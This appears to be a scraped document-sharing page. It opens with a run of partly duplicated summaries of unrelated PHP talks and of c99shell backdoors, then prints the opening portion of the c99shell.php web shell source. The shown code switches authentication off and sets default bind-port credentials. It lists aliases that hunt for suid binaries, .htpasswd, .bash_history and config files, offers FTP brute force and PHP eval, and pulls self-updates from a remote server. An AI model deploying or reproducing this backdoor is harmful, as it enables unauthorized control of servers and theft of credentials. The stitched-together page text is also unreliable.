This document contains the configuration and settings for a PHP shell script called c99shell. It defines variables for authentication, directories, file types, commands, colors and other options. It checks the client's IP and host name against allowed patterns. If authentication is enabled, it will check the login and password. The script merges request parameters to global variables for use throughout.
This document contains information about c99shell.php, a PHP-based file manager tool intended for hacking. It lists features like managing local and remote files/folders, an advanced SQL manager, executing shell commands and PHP code, and self-removal. The document provides configuration options, registered file types, command aliases, and notes on expected future changes.
This document contains PHP code for a backdoor shell. It defines various configuration settings like directories, login credentials, command aliases, and other functionality. The code authenticates the user, handles requests, and provides a basic interface for accessing the system.
This document contains the configuration and initialization code for a PHP web shell called c99shell. It sets variables for login credentials, directories, file types, aliases and other settings. It also includes code to handle cookies and sessions for the shell interface.
This document contains PHP code for a backdoor shell. It defines configuration variables and settings for features like authentication, file operations, command aliases, and updating. Functions are defined for buffer handling, sorting parameters, and copying directories. The code sets configurations, checks for updates, handles authentication, and prepares for requested actions.
This document contains PHP code for a backdoor shell. It defines configuration variables like login credentials, directories, command aliases, and other settings. It also handles authentication, sets up sessions and cookies, and has code to update the backdoor. The goal is to provide a remote access shell that can execute commands, browse files, and perform other operations on the compromised server.
This document contains the configuration and code for a PHP web shell. It sets various configuration options like the shell version, directories, file types, commands, and colors. It also checks for authentication if a login is set, sets PHP settings, merges request variables, and includes code to bypass safe mode restrictions. The code is for a backdoored web shell that provides access to the server's file system and allows execution of commands.
This document contains the configuration and settings for a PHP web shell. It defines variables for authentication, file types, commands, colors, and other options. It also contains code to check the request, merge parameters, and start the shell session.
Debugging: Rules And Tools - PHPTek 11 VersionIan Barber
The document provides rules and tools for debugging. It discusses understanding the system, making failures reproducible, quitting thinking and closely observing behaviors, dividing problems into smaller pieces, changing one thing at a time, and maintaining an audit trail of changes. Tools mentioned include Xdebug, Selenium, PHPUnit, strace, and source control systems. Logging, instrumentation, and testing techniques are also covered.
This document contains information about c99shell.php, a PHP-based file manager tool intended for hacking. It lists features like managing local and remote files/folders, an advanced SQL manager, executing shell commands and PHP code, and self-removal. The document provides configuration options, registered file types, command aliases, and notes on expected future changes.
This document contains PHP code for a backdoor shell. It defines various configuration settings like directories, login credentials, command aliases, and other functionality. The code authenticates the user, handles requests, and provides a basic interface for accessing the system.
This document contains the configuration and initialization code for a PHP web shell called c99shell. It sets variables for login credentials, directories, file types, aliases and other settings. It also includes code to handle cookies and sessions for the shell interface.
This document contains PHP code for a backdoor shell. It defines configuration variables and settings for features like authentication, file operations, command aliases, and updating. Functions are defined for buffer handling, sorting parameters, and copying directories. The code sets configurations, checks for updates, handles authentication, and prepares for requested actions.
This document contains PHP code for a backdoor shell. It defines configuration variables like login credentials, directories, command aliases, and other settings. It also handles authentication, sets up sessions and cookies, and has code to update the backdoor. The goal is to provide a remote access shell that can execute commands, browse files, and perform other operations on the compromised server.
This document contains the configuration and code for a PHP web shell. It sets various configuration options like the shell version, directories, file types, commands, and colors. It also checks for authentication if a login is set, sets PHP settings, merges request variables, and includes code to bypass safe mode restrictions. The code is for a backdoored web shell that provides access to the server's file system and allows execution of commands.
This document contains the configuration and settings for a PHP web shell. It defines variables for authentication, file types, commands, colors, and other options. It also contains code to check the request, merge parameters, and start the shell session.
Debugging: Rules And Tools - PHPTek 11 VersionIan Barber
The document provides rules and tools for debugging. It discusses understanding the system, making failures reproducible, quitting thinking and closely observing behaviors, dividing problems into smaller pieces, changing one thing at a time, and maintaining an audit trail of changes. Tools mentioned include Xdebug, Selenium, PHPUnit, strace, and source control systems. Logging, instrumentation, and testing techniques are also covered.
Teaching Your Machine To Find FraudstersIan Barber
The slides from my talk at PHP Tek 11.
When dealing with money online, fraud is an ongoing problem for both
consumers and sellers. Researchers have been developing statistical
and machine learning techniques to detect shady sellers on auction
sites, spot fraudulent payments on e-commerce systems and catch click
fraud on adverts. While there is no silver bullet, you will learn to
flag suspicious activity and help protect your site from scammers
using PHP and a little help from some other technologies.
This document describes MyShell, an interactive PHP script that allows execution of commands on a server. It includes configuration options like authentication, allowed directories, error handling and output formatting. The script generates an HTML interface with a text area to view command output. Users can navigate directories, enter commands and view results within permissions set by the administrator.
PDO provides a consistent interface for accessing databases in PHP. It allows for data access abstraction by providing a common API for different database drivers like MySQL, PostgreSQL, SQL Server and SQLite. Using PDO avoids vendor lock-in and makes it easier to change database backends without refactoring code. The document provides examples of connecting and querying databases using different database extensions like mysql, mysqli and sqlsrv and illustrates how PDO offers a consistent alternative.
Using Mikko Koppanen's PHP ZMQ extension we will look at how you can easily distribute work to background processes, provide flexible service brokering for your next service oriented architecture, and manage caches efficiently and easily with just PHP and the ZeroMQ libraries. Whether the problem is asynchronous communication, message distribution, process management or just about anything, ZeroMQ can help you build an architecture that is more resilient, more scalable and more flexible, without introducing unnecessary overhead or requiring a heavyweight queue manager node.
Conférence données à l'Open World Forum, 05 octobre 2013.
Comment créer une base de données noSQL par paires clés-valeurs en moins d'une heure, en se basant sur le bibliothèques Nanomsg et LightningDB.
This document provides an overview of 0MQ and examples of how to use it with PHP. It introduces 0MQ patterns like request/response, pub/sub, queue, and pipeline. Code snippets in PHP demonstrate implementing these patterns using 0MQ sockets. Additional resources for learning more about 0MQ and using it with PHP are provided at the end.
This document provides an overview of 0MQ (also known as ZeroMQ), a messaging library that enables various messaging patterns like request/reply, publish/subscribe, and queueing. It includes code examples in multiple languages like Erlang, Python, and PHP demonstrating how to implement common 0MQ patterns. Links are also provided for additional 0MQ resources.
As presented at Confoo 2013.
More than some arcane NoSQL tool, Redis is a simple but powerful swiss army knife you can begin using today.
This talk introduces the audience to Redis and focuses on using it to cleanly solve common problems. Along the way, we'll see how Redis can be used as an alternative to several common PHP tools.
This document contains PHP code for a web shell that provides a backdoor access to a compromised server. It defines variables for authentication, colors, and default actions. It also contains functions for handling authentication, printing headers/footers, and executing commands via the aliases array. The aliases array defines commands to run on both Windows and Linux servers, including commands to find/locate files and directories.
PDO (PHP Data Objects) provides a common interface for accessing databases in PHP. It uses prepared statements to separate SQL structures from user-supplied input, improving security and performance. PDO supports databases like MySQL, PostgreSQL, SQLite, and Oracle. It offers flexible fetching of query results as arrays, objects, or callbacks. PDO also includes features like transactions, metadata retrieval, and error handling via exceptions.
The document discusses various methods for working with files in PHP, including including files with include() and require_once(), testing for file existence with file_exists(), opening files with fopen(), reading files with functions like fgets(), fread(), fgetc(), moving within files using fseek(), writing to files with fwrite() and fputs(), appending with file_put_contents(), and locking files during writes with flock().
Стажировка 2016-07-27 02 Денис Нелюбин. PostgreSQL и jsonbSmartTools
The document discusses using PostgreSQL and JSONB data. It covers installing PostgreSQL, connecting to a database, configuring network access and authentication, creating a database and user, inserting and querying JSONB data using operators like ->> and ->, updating and deleting rows, and creating a functional index to query on fields within the JSONB data.
PHP Data Objects (PDO) provides a clear, simple (but powerful), unified API for working with all our favorite databases. Features include prepared statements with bound parameters (for all databases, even those that don’t natively support them), transactions, cursors, LOBs, and flexible error handling.
Mengembalikan data yang terhapus atau rusak pada hardisk menggunakan ubuntuAlferizhy Chalter
The document provides instructions for recovering deleted or damaged data on a hard drive using Ubuntu. It explains how to install and use TestDisk to recover files. The script runs TestDisk to recover lost files, then sorts the recovered files into different folders based on file type like documents, images, videos etc. Running the script as root user, it recovers the data and notifies the user once complete.
Conheça um pouco mais sobre Perl 6, uma linguagem de programação moderna, poderosa e robusta que permitirá que você escreva código de forma ágil e eficiente.
This document contains PHP code for a backdoor shell. It defines configuration variables and settings for features like authentication, file operations, command aliases, and updating. Functions are defined for buffer handling, sorting parameters, and copying directories. The code sets constants, merges request data, checks for updates, and handles authentication before dispatching to different actions.
This document contains the configuration and code for a PHP backdoor shell. It sets various options like the shell version, directories, enabled functions, command aliases, and more. The code also checks for updates, handles file operations and sessions, and has logic to restrict access by IP, authentication, or other means.
This PHP script is a web shell that allows remote command execution on the server. It sets various PHP configuration options to disable security restrictions. It also checks for an authentication password and sets a cookie upon valid login. The main body defines functions for outputting headers, menus and executing commands via the shell.
A lot of people using PHPunit for testing their source code. While I was observing my team
I recognized most of them are only using the standard ssertions like 'assertEquals()' or
'assertTrue()' and are complaining about how hard it is to test the code even when the tests are written first. This talk is about all the stuff not used on a daily basis. It shows you some nice features of PHPUnit and how to use them for your benefit.
The document discusses using vfsStream to mock the filesystem in unit tests. vfsStream provides a virtual filesystem that uses PHP streams, allowing tests to manipulate files and directories without interacting with the real filesystem. It describes how to set up vfsStream, create and interact with virtual files and directories, and a vfsStream PHPUnit helper that simplifies its integration with PHPUnit tests.
Teaching Your Machine To Find FraudstersIan Barber
The slides from my talk at PHP Tek 11.
When dealing with money online, fraud is an ongoing problem for both
consumers and sellers. Researchers have been developing statistical
and machine learning techniques to detect shady sellers on auction
sites, spot fraudulent payments on e-commerce systems and catch click
fraud on adverts. While there is no silver bullet, you will learn to
flag suspicious activity and help protect your site from scammers
using PHP and a little help from some other technologies.
This document describes MyShell, an interactive PHP script that allows execution of commands on a server. It includes configuration options like authentication, allowed directories, error handling and output formatting. The script generates an HTML interface with a text area to view command output. Users can navigate directories, enter commands and view results within permissions set by the administrator.
PDO provides a consistent interface for accessing databases in PHP. It allows for data access abstraction by providing a common API for different database drivers like MySQL, PostgreSQL, SQL Server and SQLite. Using PDO avoids vendor lock-in and makes it easier to change database backends without refactoring code. The document provides examples of connecting and querying databases using different database extensions like mysql, mysqli and sqlsrv and illustrates how PDO offers a consistent alternative.
Using Mikko Koppanen's PHP ZMQ extension we will look at how you can easily distribute work to background processes, provide flexible service brokering for your next service oriented architecture, and manage caches efficiently and easily with just PHP and the ZeroMQ libraries. Whether the problem is asynchronous communication, message distribution, process management or just about anything, ZeroMQ can help you build an architecture that is more resilient, more scalable and more flexible, without introducing unnecessary overhead or requiring a heavyweight queue manager node.
Conférence données à l'Open World Forum, 05 octobre 2013.
Comment créer une base de données noSQL par paires clés-valeurs en moins d'une heure, en se basant sur le bibliothèques Nanomsg et LightningDB.
This document provides an overview of 0MQ and examples of how to use it with PHP. It introduces 0MQ patterns like request/response, pub/sub, queue, and pipeline. Code snippets in PHP demonstrate implementing these patterns using 0MQ sockets. Additional resources for learning more about 0MQ and using it with PHP are provided at the end.
This document provides an overview of 0MQ (also known as ZeroMQ), a messaging library that enables various messaging patterns like request/reply, publish/subscribe, and queueing. It includes code examples in multiple languages like Erlang, Python, and PHP demonstrating how to implement common 0MQ patterns. Links are also provided for additional 0MQ resources.
As presented at Confoo 2013.
More than some arcane NoSQL tool, Redis is a simple but powerful swiss army knife you can begin using today.
This talk introduces the audience to Redis and focuses on using it to cleanly solve common problems. Along the way, we'll see how Redis can be used as an alternative to several common PHP tools.
This document contains PHP code for a web shell that provides a backdoor access to a compromised server. It defines variables for authentication, colors, and default actions. It also contains functions for handling authentication, printing headers/footers, and executing commands via the aliases array. The aliases array defines commands to run on both Windows and Linux servers, including commands to find/locate files and directories.
PDO (PHP Data Objects) provides a common interface for accessing databases in PHP. It uses prepared statements to separate SQL structures from user-supplied input, improving security and performance. PDO supports databases like MySQL, PostgreSQL, SQLite, and Oracle. It offers flexible fetching of query results as arrays, objects, or callbacks. PDO also includes features like transactions, metadata retrieval, and error handling via exceptions.
The document discusses various methods for working with files in PHP, including including files with include() and require_once(), testing for file existence with file_exists(), opening files with fopen(), reading files with functions like fgets(), fread(), fgetc(), moving within files using fseek(), writing to files with fwrite() and fputs(), appending with file_put_contents(), and locking files during writes with flock().
Стажировка 2016-07-27 02 Денис Нелюбин. PostgreSQL и jsonbSmartTools
The document discusses using PostgreSQL and JSONB data. It covers installing PostgreSQL, connecting to a database, configuring network access and authentication, creating a database and user, inserting and querying JSONB data using operators like ->> and ->, updating and deleting rows, and creating a functional index to query on fields within the JSONB data.
PHP Data Objects (PDO) provides a clear, simple (but powerful), unified API for working with all our favorite databases. Features include prepared statements with bound parameters (for all databases, even those that don’t natively support them), transactions, cursors, LOBs, and flexible error handling.
Mengembalikan data yang terhapus atau rusak pada hardisk menggunakan ubuntuAlferizhy Chalter
The document provides instructions for recovering deleted or damaged data on a hard drive using Ubuntu. It explains how to install and use TestDisk to recover files. The script runs TestDisk to recover lost files, then sorts the recovered files into different folders based on file type like documents, images, videos etc. Running the script as root user, it recovers the data and notifies the user once complete.
Conheça um pouco mais sobre Perl 6, uma linguagem de programação moderna, poderosa e robusta que permitirá que você escreva código de forma ágil e eficiente.
This document contains PHP code for a backdoor shell. It defines configuration variables and settings for features like authentication, file operations, command aliases, and updating. Functions are defined for buffer handling, sorting parameters, and copying directories. The code sets constants, merges request data, checks for updates, and handles authentication before dispatching to different actions.
This document contains the configuration and code for a PHP backdoor shell. It sets various options like the shell version, directories, enabled functions, command aliases, and more. The code also checks for updates, handles file operations and sessions, and has logic to restrict access by IP, authentication, or other means.
This PHP script is a web shell that allows remote command execution on the server. It sets various PHP configuration options to disable security restrictions. It also checks for an authentication password and sets a cookie upon valid login. The main body defines functions for outputting headers, menus and executing commands via the shell.
A lot of people using PHPunit for testing their source code. While I was observing my team
I recognized most of them are only using the standard ssertions like 'assertEquals()' or
'assertTrue()' and are complaining about how hard it is to test the code even when the tests are written first. This talk is about all the stuff not used on a daily basis. It shows you some nice features of PHPUnit and how to use them for your benefit.
The document discusses using vfsStream to mock the filesystem in unit tests. vfsStream provides a virtual filesystem that uses PHP streams, allowing tests to manipulate files and directories without interacting with the real filesystem. It describes how to set up vfsStream, create and interact with virtual files and directories, and a vfsStream PHPUnit helper that simplifies its integration with PHPUnit tests.
international PHP2011_Bastian Feder_The most unknown Parts of PHPUnitsmueller_sandsmedia
PHPUnit provides many features beyond just testing code including:
- Command line options like --testdox to generate styled reports and --filter to select specific tests.
- Annotations like @covers and @group to document and organize tests.
- Various assertion methods like assertContains(), assertType(), and assertSelectRegExp() to validate test conditions.
- Test listeners that get called at different test execution stages to add functionality.
- Ways to test exceptions like @expectedException and try/catch blocks.
- Mocking features to isolate tests from external dependencies using callbacks and return values.
A lot of people using PHPunit for testing their source code. While I was observing my team I recognized most of them are only using the standard assertions like 'assertEquals()' and are complaining about how hard it is to test the code even when the tests are written first. This talk is about all the stuff not used on a daily basis and it digs deep into uncommon features of PHPUnit.
This script is used to start and stop the Apache Tomcat application server. It checks environment variables and Java installation locations. It then executes the specified command, such as "start", "stop", "debug" passing in JVM options and system properties. The script handles tasks like setting up the classpath, checking for required files, and running Java in the background for startup.
Can't Miss Features of PHP 5.3 and 5.4Jeff Carouth
If you're like me you remember the days of PHP3 and PHP4; you remember when PHP5 was released, and how it was touted to change to your life. It's still changing and there are some features of PHP 5.3 and new ones coming with PHP 5.4 that will improve your code readability and reusability. Let's look at some touted features such as closures, namespaces, and traits, as well as some features being discussed for future releases.
Raphaël Pinson's talk on "Configuration surgery with Augeas" at PuppetCamp Geneva '12. Video at http://youtu.be/H0MJaIv4bgk
Learn more: www.puppetlabs.com
The document discusses Augeas, an open source configuration editing tool that parses configuration files into a tree structure and allows editing them using a standardized API, lenses provide parsers for common configuration files and it can be used from configuration management tools like Puppet to securely edit files. Native providers can also be written for Augeas to manage complex configuration files like sshd_config that use grouping.
Go beyond the documentation and explore some of what's possible if you stretch symfony to its limits. We will look at a number of aspects of symfony 1.4 and Doctrine 1.2 and tease out some powerful functionality you may not have expected to find, but will doubtless be able to use. Topics covered will include routing, forms, the config cache and record listeners. If you're comfortable in symfony and wondering what's next, this session is for you.
The document discusses various PHP wrappers that can be used to read and write data in non-standard ways and bypass security restrictions. It describes how wrappers like php://filter, zip://, and data:// can be used to read and write local files, modify file contents, bypass authentication, and perform XXE attacks. It also notes that filters in the php://filter wrapper can be used to selectively remove parts of file contents during I/O operations.
This presentation is for those students and IT professionals who have basic programming knowledge and want to learn Perl basics for Pentesting.
We have explained minimal Perl basics which a pentester should know to write,read,modify Perl scripts for Pentesting like data type, comparison operator, loop controls, minimal CPAN modules related to web and networking, perl scripts in Kali and some demo
The document discusses various techniques for extending and improving Perl, including both good and potentially evil techniques. It covers Perl modules that port Perl 6 features to Perl 5 like given/when switches and state variables. It also discusses techniques for runtime introspection and modification like PadWalker and source filters. The document advocates for continuing to extend Perl 5 with modern features to keep it relevant and powerful.
This document discusses using ngx_lua with UPYUN CDN. It provides examples of using Lua with Nginx for tasks like caching, health checking, and configuration as a service. Key points include using Lua for base64 encoding, Redis lookups, and upstream health checking. Lua provides a more flexible alternative to C modules for tasks like these by leveraging its embedding in Nginx via ngx_lua.
Simple Ways To Be A Better Programmer (OSCON 2007)Michael Schwern
"Simple Ways To Be A Better Programmer' as presented at OSCON 2007 by Michael G Schwern.
The audio is still out of sync, working on it. Downloading will be available once the sync is done.
Variable interpolation is a standard way to BASH your head. This talk looks at interpolation, eval, ${} handling and "set -vx" to debug basic variable handling.
The document discusses various features and capabilities of PHPUnit for testing PHP code. It covers command line options for PHPUnit like filters and coverage reports. It also covers different types of assertions for validating test expectations, using annotations to organize tests, and special tests for things like exceptions. The document aims to explain some of the more advanced but lesser known aspects of using PHPUnit for testing.
1. <?php
/*
***********************************************************************************
*******************
*
* c99shell.php v.1.0 Shellci.Biz
* SheLL Arshive
* c99shell - www.shellci.biz
*
***********************************************************************************
*******************
*/
//Starting calls
if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) =
explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
error_reporting(5);
@ignore_user_abort(true);
@set_magic_quotes_runtime(0);
@set_time_limit(0);
$win = strtolower(substr(PHP_OS, 0, 3)) == "win";
if (!@ob_get_contents()) {@ob_start(); @ob_implicit_flush(0);}
define("starttime",getmicrotime());
if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function
strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if
(strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr =
stripslashes($arr);}}} strips($GLOBALS);}
$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
$shver = "1.0 beta (21.05.2005)"; //Current version
//CONFIGURATION AND SETTINGS
if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";}
elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);}
else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL
}
$surl_autofill_include = true; //If true then search variables with descriptors
(URLs) and save it in SURL.
if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach
(explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name =
urldecode($v[0]); $value = urldecode($v[1]); foreach
(array("http://","https://","ssl://","ftp://","") as $needle) {if
(strpos($value,$needle) === 0) {$includestr .=
urlencode($name)."=".urlencode($value)."&";}}} if
($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
if (empty($surl))
{
$surl = "?".$includestr; //Self url
}
$surl = htmlspecialchars($surl);
$timelimit = 60; //limit of execution this script (seconds), 0 = unlimited.
//Authentication
$login = "c99"; //login
//DON'T FORGOT ABOUT CHANGE PASSWORD!!!
2. $pass = "c99"; //password
$md5_pass = ""; //md5-cryped pass. if null, md5($pass)
/*COMMENT IT FOR TURN ON AUTHENTIFICATION >>>*/ $login = false; //turn off
authentification
$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST
e.g. array("192.168.0.*","127.0.0.1")
$login_txt = "Restricted area"; //http-auth message.
$accessdeniedmess = "<a href="http://ccteam.ru/releases/c99shell">c99shell v.".
$shver."</a>: access denied";
$autoupdate = false; //Automatic updating?
$updatenow = false; //If true, update now
$c99sh_updatefurl = "http://ccteam.ru/releases/update/c99shell/"; //Update server
$filestealth = false; //if true, don't change modify&access-time
$donated_html = "<center><b>GaRDeNFoX</b></center>";
/* If you publish free shell and you wish
add link to your site or any other information,
put here your html. */
$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array,
display $donated_html.
$curdir = "./"; //start directory
//$curdir = getenv("DOCUMENT_ROOT");
$tmpdir = ""; //Directory for tempory files. If empty, auto-fill (/tmp or
%WINDIR/temp)
$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)
$log_email = "user@host.tld"; //Default e-mail for sending logs
$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or
"d"escending
$sort_save = true; //If true then save sorting-type.
// Registered file-types.
// array(
// "{action1}"=>array("ext1","ext2","ext3",...),
// "{action2}"=>array("ext4","ext5","ext6",...),
// ...
// )
$ftypes = array(
"html"=>array("html","htm","shtml"),
"txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"
),
"exe"=>array("sh","install","bat","cmd"),
"ini"=>array("ini","inf"),
"code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl
"),
"img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi",
"mpg","mpeg"),
"sdb"=>array("sdb"),
"phpsess"=>array("sess"),
"download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
);
// Registered executable file-types.
3. // array(
// string "command{i}"=>array("ext1","ext2","ext3",...),
// ...
// )
// {command}: %f% = filename
$exeftypes = array(
getenv("PHPRC")." %f%"=>array("php","php3","php4"),
);
/* Highlighted files.
array(
i=>array({regexp},{type},{opentag},{closetag},{break})
...
)
string {regexp} - regular exp.
int {type}:
0 - files and folders (as default),
1 - files only, 2 - folders only
string {opentag} - open html-tag, e.g. "<b>" (default)
string {closetag} - close html-tag, e.g. "</b>" (default)
bool {break} - if true and found match then break
*/
$regxp_highlight = array(
array(basename($_SERVER["PHP_SELF"]),1,"<font color="yellow">","</font>"), //
example
array("config.php",1) // example
);
$safemode_diskettes = array("a"); // This variable for disabling diskett-errors.
// array (i=>{letter} ...);
string {letter} - letter of a drive
// Set as false or for turn
off.
$hexdump_lines = 8; // lines in hex preview file
$hexdump_rows = 24; // 16, 24 or 32 bytes in one line
$nixpwdperpage = 100; // Get first N lines from /etc/passwd
$bindport_pass = "c99"; // default password for binding
$bindport_port = "11457"; // default port for binding
// Command-aliases
if (!$win)
{
$cmdaliases = array(
array("-----------------------------------------------------------", "ls -la"),
array("find all suid files", "find / -type f -perm -04000 -ls"),
array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
array("find all sgid files", "find / -type f -perm -02000 -ls"),
array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
array("find config.inc.php files", "find / -type f -name config.inc.php"),
array("find config* files", "find / -type f -name "config*""),
array("find config* files in current dir", "find . -type f -name "config*""),
array("find all writable directories and files", "find / -perm -2 -ls"),
array("find all writable directories and files in current dir", "find . -perm -2
-ls"),
array("find all service.pwd files", "find / -type f -name service.pwd"),
array("find service.pwd files in current dir", "find . -type f -name
service.pwd"),
4. array("find all .htpasswd files", "find / -type f -name .htpasswd"),
array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
array("find all .bash_history files", "find / -type f -name .bash_history"),
array("find .bash_history files in current dir", "find . -type f -name
.bash_history"),
array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
array("find .fetchmailrc files in current dir", "find . -type f -name
.fetchmailrc"),
array("list file attributes on a Linux second extended file system", "lsattr
-va"),
array("show opened ports", "netstat -an | grep -i listen")
);
}
else
{
$cmdaliases = array(
array("-----------------------------------------------------------", "dir"),
array("show opened ports", "netstat -an")
);
}
$sess_cookie = "c99shvars"; // Cookie-variable name
$usefsbuff = true; //Buffer-function
$copy_unset = false; //Remove copied files from buffer after pasting
//Quick launch
$quicklaunch = array(
array("<img src="".$surl."act=img&img=home" alt="Home" height="20"
width="20" border="0">",$surl),
array("<img src="".$surl."act=img&img=back" alt="Back" height="20"
width="20" border="0">","#" onclick="history.back(1)"),
array("<img src="".$surl."act=img&img=forward" alt="Forward" height="20"
width="20" border="0">","#" onclick="history.go(1)"),
array("<img src="".$surl."act=img&img=up" alt="UPDIR" height="20"
width="20" border="0">",$surl."act=ls&d=%upd&sort=%sort"),
array("<img src="".$surl."act=img&img=refresh" alt="Refresh" height="20"
width="17" border="0">",""),
array("<img src="".$surl."act=img&img=search" alt="Search" height="20"
width="20" border="0">",$surl."act=search&d=%d"),
array("<img src="".$surl."act=img&img=buffer" alt="Buffer" height="20"
width="20" border="0">",$surl."act=fsbuff&d=%d"),
array("<b>Encoder</b>",$surl."act=encoder&d=%d"),
array("<b>Bind</b>",$surl."act=bind&d=%d"),
array("<b>Proc.</b>",$surl."act=ps_aux&d=%d"),
array("<b>FTP brute</b>",$surl."act=ftpquickbrute&d=%d"),
array("<b>Sec.</b>",$surl."act=security&d=%d"),
array("<b>SQL</b>",$surl."act=sql&d=%d"),
array("<b>PHP-code</b>",$surl."act=eval&d=%d"),
array("<b>Feedback</b>",$surl."act=feedback&d=%d"),
array("<b>Self remove</b>",$surl."act=selfremove"),
array("<b>Logout</b>","#" onclick="if (confirm('Are you sure?'))
window.close()")
);
//Highlight-code colors
$highlight_background = "#c0c0c0";
$highlight_bg = "#FFFFFF";
$highlight_comment = "#6A6A6A";
5. $highlight_default = "#0000BB";
$highlight_html = "#1300FF";
$highlight_keyword = "#007700";
$highlight_string = "#000000";
@$f = $_REQUEST["f"];
@extract($_REQUEST["c99shcook"]);
//END CONFIGURATION
// / Next code isn't for editing /
$tmp = array();
foreach($host_allow as $k=>$v) {$tmp[] = str_replace("*",".*",preg_quote($v));}
$s = "!^(".implode("|",$tmp).")$!i";
if (!preg_match($s,getenv("REMOTE_ADDR")) and !
preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a
href="http://ccteam.ru/releases/cc99shell">c99shell</a>: Access Denied - your
host (".getenv("REMOTE_ADDR").") not allow");}
if ($login)
{
if(empty($md5_pass)) {$md5_pass = md5($pass);}
if (($_SERVER["PHP_AUTH_USER"] != $login ) or (md5($_SERVER["PHP_AUTH_PW"]) !=
$md5_pass))
{
if ($login_txt === false) {$login_txt = "";}
elseif (empty($login_txt)) {$login_txt = strip_tags(ereg_replace(" |<br>","
",$donated_html));}
header("WWW-Authenticate: Basic realm="c99shell ".$shver.": ".$login_txt.""");
header("HTTP/1.0 401 Unauthorized");
exit($accessdeniedmess);
}
}
if ($act != "img")
{
$lastdir = realpath(".");
chdir($curdir);
if (($selfwrite) or ($updatenow))
{
if ($selfwrite == "1") {$selfwrite = "c99shell.php";}
c99sh_getupdate();
$data = file_get_contents($c99sh_updatefurl);
$fp = fopen($data,"w");
fwrite($fp,$data);
fclose($fp);
exit;
}
$sess_data = unserialize($_COOKIE["$sess_cookie"]);
if (!is_array($sess_data)) {$sess_data = array();}
if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
if (!function_exists("c99_buff_prepare"))
{
function c99_buff_prepare()
{
global $sess_data;
global $act;
foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] =
6. str_replace("",DIRECTORY_SEPARATOR,realpath($v));}
foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] =
str_replace("",DIRECTORY_SEPARATOR,realpath($v));}
$sess_data["copy"] = array_unique($sess_data["copy"]);
$sess_data["cut"] = array_unique($sess_data["cut"]);
sort($sess_data["copy"]);
sort($sess_data["cut"]);
if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"]
[$k] == $v) {unset($sess_data["copy"][$k]); }}}
else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v)
{unset($sess_data["cut"][$k]);}}}
}
}
c99_buff_prepare();
if (!function_exists("c99_sess_put"))
{
function c99_sess_put($data)
{
global $sess_cookie;
global $sess_data;
c99_buff_prepare();
$sess_data = $data;
$data = serialize($data);
setcookie($sess_cookie,$data);
}
}
if ($sort_save)
{
if (!empty($sort)) {setcookie("sort",$sort);}
if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
}
if (!function_exists("str2mini"))
{
function str2mini($content,$len)
{
if (strlen($content) > $len)
{
$len = ceil($len/2) - 2;
return substr($content, 0, $len)."...".substr($content, -$len);
}
else {return $content;}
}
}
if (!function_exists("view_size"))
{
function view_size($size)
{
if (!is_numeric($size)) {return false;}
else
{
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
else {$size = $size . " B";}
return $size;
}
}
}
if (!function_exists("fs_copy_dir"))
7. {
function fs_copy_dir($d,$t)
{
$d = str_replace("",DIRECTORY_SEPARATOR,$d);
if (substr($d,-1,1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
$h = opendir($d);
while (($o = readdir($h)) !== false)
{
if (($o != ".") and ($o != ".."))
{
if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,
$t.DIRECTORY_SEPARATOR.$o);}
else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o);
fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
if (!$ret) {return $ret;}
}
}
closedir($h);
return true;
}
}
if (!function_exists("fs_copy_obj"))
{
function fs_copy_obj($d,$t)
{
$d = str_replace("",DIRECTORY_SEPARATOR,$d);
$t = str_replace("",DIRECTORY_SEPARATOR,$t);
if (!is_dir(dirname($t))) {mkdir(dirname($t));}
if (is_dir($d))
{
if (substr($d,-1,1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
if (substr($t,-1,1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
return fs_copy_dir($d,$t);
}
elseif (is_file($d)) {return copy($d,$t);}
else {return false;}
}
}
if (!function_exists("fs_move_dir"))
{
